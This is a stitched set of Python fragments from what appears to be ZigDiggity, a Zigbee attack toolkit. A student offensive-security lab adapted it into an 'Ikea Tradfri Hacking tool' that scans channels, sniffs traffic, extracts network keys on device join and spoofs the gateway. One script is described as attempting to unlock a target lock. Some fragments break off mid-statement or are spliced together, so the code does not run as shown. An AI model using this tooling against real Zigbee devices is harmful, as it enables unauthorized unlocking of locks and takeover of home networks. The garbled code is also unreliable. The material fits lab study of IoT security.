from zigdiggity.misc.actions import * from zigdiggity.interface.components.logo import Logo parser = argparse.ArgumentParser(description='Attempt to unlock the target lock') parser.add_argument('-c','--channel',action='store',type=int,dest='channel',required=True,help='Channel to use') parser.add_argument('-e','--epan',action='store',type=lambda s: int(s.replace(':',''),16),dest='epan',required=True,help='The Extended PAN ID of the network to target') parser.add_argument('-a','--address',action='store',type=lambda s: int(s.replace(':',''),16),dest='address',required=True,help='The address of the device to target') parser.add_argument('-k','--key',action='store',type=lambda s: int(s.replace(':',''),16),dest='key',required=True,help='The network encryption key of the target network') parser.add_argument('-w','--wireshark',action='store_true',dest='wireshark',required=False,help='See all traffic in wireshark') args = parser.parse_args() logo = Logo() logo.print() hardware_radio = RaspbeeRadio("/dev/ttyS0") radio = ObserverRadio(hardware_radio) if args.wireshark: wireshark = WiresharkObserver() radio.add_observer(wireshark) TARGET_EPAN = args.epan NWK_KEY = struct.pack(">QQ",args.key>>64,args.key%(2**64)) channel = target_addr = args.address start_time = time.time() radio.set_channel(channel) panid = get_pan_by_extended_pan(radio, TARGET_EPAN)
dest='epan', required=True, help='The Extended PAN ID of the network to target') parser.add_argument('-w', '--wireshark', action='store_true', dest='wireshark', required=False, help='The Extended PAN ID of the network to target') args = parser.parse_args() logo = Logo() logo.print() hardware_radio = RaspbeeRadio("/dev/ttyS0") radio = ObserverRadio(hardware_radio) if args.wireshark: wireshark = WiresharkObserver() radio.add_observer(wireshark) def handle_interrupt(signal, frame): global interrupted print_notify("Exiting the current script") interrupted = True CHANNEL = TARGET_EPAN = args.epan
import sys sys.path.append(os.getcwd() + "/zigdiggity") import time import argparse from zigdiggity.radios.raspbee_radio import RaspbeeRadio from zigdiggity.radios.observer_radio import ObserverRadio import zigdiggity.observers.utils as observer_utils from scapy.layers.dot15d4 import * from scapy.layers.zigbee import * from zigdiggity.interface.console import print_notify from zigdiggity.interface.components.logo import Logo from zigdiggity.misc.timer import Timer logo = Logo() logo.print() hardware_radio = RaspbeeRadio("/dev/ttyS0") radio = ObserverRadio(hardware_radio) observer_utils.register_wireshark(radio) CHANNELS = [11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25] for channel in CHANNELS: radio.set_channel(channel) print_notify("Listening to channel %d" % radio.get_channel()) timer = Timer(10) while (not timer.has_expired()): result = radio.receive()
dest='channel', required=True, help='Channel to use') parser.add_argument('-w', '--wireshark', action='store_true', dest='wireshark', required=False, help='See all traffic in wireshark') args = parser.parse_args() logo = Logo() logo.print() hardware_radio = RaspbeeRadio("/dev/ttyS0") radio = ObserverRadio(hardware_radio) if args.wireshark: wireshark = WiresharkObserver() radio.add_observer(wireshark) radio.set_channel( print_notify("Sending the beacon request") radio.send(beacon_request(random.randint(0, 255))) timer = Timer(5) while not timer.has_expired(): radio.receive()
return os.system('clear') clear() print("\n") logo = Logo() logo.print() print_info("Welcome to the Zigbee Lighting Link (Ikea Tradfri) Hacking tool!") print_info("By group 102 for Lab on offenive Computer Security.") wireshark = None hardware_radio = RaspbeeRadio("/dev/ttyS0") radio = ObserverRadio(hardware_radio) while True: questions = [{ 'type': 'list', 'name': 'program', 'message': 'What would you like to do?', 'choices': [ '1. Scan Zigbee channels for Networks', '2. Listen on ZigBee channel', '3. Extract key on device join', '4. Spoof the gateway' ], }, {